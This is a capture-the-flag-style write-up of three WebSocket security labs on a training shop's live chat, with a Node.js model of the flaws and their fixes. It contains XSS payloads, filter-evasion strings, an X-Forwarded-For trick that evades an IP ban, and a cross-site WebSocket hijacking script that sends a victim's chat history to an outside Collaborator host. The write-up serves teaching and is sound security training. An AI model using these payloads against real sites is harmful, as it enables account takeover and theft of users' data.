
# Testing for WebSockets security vulnerabilities

### Lab: Manipulating WebSocket messages to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time.

`/chat` **-> Live chat**

```
→ To server
{"message":"test"}
← To client
{"user":"You","content":"test"}
```

The only protection is client-side: the page's JavaScript HTML-encodes the message before calling `ws.send()`, and the server forwards whatever it receives to the support agent without encoding it again.

Intercept the WebSocket message in Burp, send it to Repeater, reconnect if the socket has closed, and send the raw payload directly so it never passes through the browser's encoding:

```
{"message":"<img src=1 onerror='alert(1)'>"}
```

### Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. It has an aggressive but flawed XSS filter.

`/chat` **-> Live chat**

```
→ To server
{"message":"<img onclick='alert(1)'>test</img>"}
← To client
{"error":"Attack detected: Event handler"}

→ To server
{"message":"<iframe src='javascript:alert(0)'>"}
← To client
{"error":"Attack detected: JavaScript"}

→ To server
{"message":"<iframe src='javascRipt:alert(0)'>"}
← To client
{"error":"Attack detected: Alert"}

→ To server
{"message":"<iframe src='javascRipt:%61lert(0)'>"}
```

The `a` of `alert` is URL-encoded as `%61` so the "Alert" keyword check no longer matches, and the mixed-case `javascRipt:` defeats the case-sensitive "JavaScript" check; the browser percent-decodes a `javascript:` URL before executing it.

After an attack is detected the server blacklists your IP address and refuses further handshakes. The blacklist is keyed on the `X-Forwarded-For` header rather than the real source address, so add this header to the handshake request in Repeater before reconnecting:

`X-Forwarded-For: (any value)`
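The following is an added example, not code from the labs or from this page's author: a Node.js model of the two chat back ends above, showing why client-side HTML encoding (first lab) and a keyword blacklist plus a header-keyed IP ban (second lab) both fail, beside the server-side encoding that actually works. Every function name, the blacklist rules and the sample frames are constructed to mirror the observed exchanges; they are assumptions about the lab's internals, not its real code.

```javascript
// Added illustration, not the lab's code. Models the chat server from the two labs above.

// --- Lab 1: the browser encodes before ws.send(), the server echoes raw ---
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// What the legitimate page does before sending the frame.
function browserClientSend(text) {
  return JSON.stringify({ message: htmlEncode(text) });
}

// What Burp Repeater (or any raw client) can send: the same frame, no encoding.
function rawClientSend(text) {
  return JSON.stringify({ message: text });
}

// Vulnerable server: assumes the client already encoded and forwards content as-is.
function vulnerableServerHandle(frame) {
  const { message } = JSON.parse(frame);
  return JSON.stringify({ user: 'You', content: message });
}

// Hardened server: encode at the trust boundary, on receipt, whatever the client did.
function hardenedServerHandle(frame) {
  const { message } = JSON.parse(frame);
  return JSON.stringify({ user: 'You', content: htmlEncode(message) });
}

// --- Lab 2: a keyword blacklist that reproduces the three "Attack detected" labels ---
const BLACKLIST = [
  { label: 'Event handler', re: /on\w+\s*=/i },
  { label: 'JavaScript',    re: /javascript:/ },   // case-sensitive: "javascRipt:" slips through
  { label: 'Alert',         re: /alert/ },         // literal match: "%61lert" slips through
];

// Returns the lab-style error label, or null when the message passes the filter.
function blacklistFilter(message) {
  for (const rule of BLACKLIST) if (rule.re.test(message)) return rule.label;
  return null;
}

// Same rules, but normalised the way a browser would before matching. Still a blacklist:
// it only closes the two bypasses shown on this page, which is why output encoding is the fix.
function normalisingFilter(message) {
  let norm = message;
  try { norm = decodeURIComponent(norm); } catch (e) { /* keep as-is on a bad %-sequence */ }
  norm = norm.toLowerCase();
  for (const rule of BLACKLIST) if (new RegExp(rule.re.source, 'i').test(norm)) return rule.label;
  return null;
}

// --- Lab 2, second flaw: the ban after a detection is keyed on a client-controlled header ---
function vulnerableClientKey(headers, remoteAddr) {
  return headers['x-forwarded-for'] || remoteAddr;   // attacker picks a fresh value per request
}
function hardenedClientKey(headers, remoteAddr) {
  return remoteAddr;   // trust X-Forwarded-For only when your own proxy sets it, and then only its last hop
}

const PAYLOAD = "<img src=1 onerror='alert(1)'>";
console.log(vulnerableServerHandle(rawClientSend(PAYLOAD)));   // raw <img ...> reaches the agent's DOM
console.log(hardenedServerHandle(rawClientSend(PAYLOAD)));     // &lt;img ... stays text
console.log(blacklistFilter("<iframe src='javascRipt:%61lert(0)'>"));    // null: bypassed
console.log(normalisingFilter("<iframe src='javascRipt:%61lert(0)'>"));  // JavaScript
```

Run it with `node` on any recent version; the two `*ClientKey` functions take headers lower-cased as Node's `http` module presents them.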

### Lab: Cross-site WebSocket hijacking

This online shop has a live chat feature implemented using WebSockets.

To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this to gain access to their account.

```
Request:
GET /chat HTTP/1.1
Host: acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Upgrade: websocket
Origin: https://acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=0eUxfWHWU1z3UUKb9xAUqwNhI0jPJe5f
Sec-WebSocket-Key: kLHi+hZ7ECII+qRH3585hQ==

Response:
HTTP/1.1 101 Switching Protocol
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: GQ79sfJLT+ljrMNywxhuWRsOD8Q=
Content-Length: 0

<form id="chatForm" action="wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat">
```

The handshake is protected only by the session cookie: there is no CSRF token in the request, and the server accepts the upgrade regardless of the `Origin` header. Any page the victim visits can therefore call `new WebSocket()` against `/chat` and the browser attaches the victim's cookie (this requires the cookie to be sent cross-site, i.e. not restricted by `SameSite`).

**Exploit Server ->**

```
Body:

  <script>
    // Opened from the attacker's page; the victim's browser still attaches the
    // target's session cookie to the handshake because nothing binds it to an origin.
    var ws = new WebSocket('wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat');
    ws.onopen = function() {
      // The chat server replays the stored history when it receives "READY".
      ws.send("READY");
    };
    ws.onmessage = function(event) {
      // Forward every replayed message to Collaborator; no-cors avoids a preflight.
      fetch('https://gtdks02v6yt40r756at6r1o59wfm3b.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
    };
  </script>
```

```
Collaborator:

{"user":"Hal Pline","content":"No problem carlos, it's dqpl6qi78qaekjz7wh6d"}
```

The replayed history leaks the victim's credentials: log in as `carlos` with the password from that message to solve the lab.

